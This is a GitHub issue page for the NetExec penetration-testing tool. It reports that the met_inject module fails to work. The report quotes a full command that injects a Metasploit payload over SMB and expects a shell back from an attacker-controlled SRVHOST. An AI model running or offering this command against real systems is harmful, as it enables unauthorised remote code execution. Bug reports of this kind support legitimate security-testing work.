We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Describe the bug The module doesn't seem to be working, or at least, the example payloads I previously documented are not working correctly
To Reproduce Steps to reproduce the behavior i.e.: Command: netexec smb -u username -p password -M met_inject -o SRVHOST=$ip SRVPORT=$port RAND=$rand
netexec smb -u username -p password -M met_inject -o SRVHOST=$ip SRVPORT=$port RAND=$rand
Expected behavior I expect the module to inject a payload and get a shell
NetExec info
main
Goals
The text was updated successfully, but these errors were encountered:
fix(met_inject): simplify metasploit cradle, add logging, and update …
ca74acd
…documentation; related to #223
Marshall-Hallenbeck
Successfully merging a pull request may close this issue.
Describe the bug
The module doesn't seem to be working, or at least, the example payloads I previously documented are not working correctly
To Reproduce
Steps to reproduce the behavior i.e.:
Command:
netexec smb -u username -p password -M met_inject -o SRVHOST=$ip SRVPORT=$port RAND=$rand
Expected behavior
I expect the module to inject a payload and get a shell
NetExec info
main
(commit fb8c4bc)Goals
The text was updated successfully, but these errors were encountered: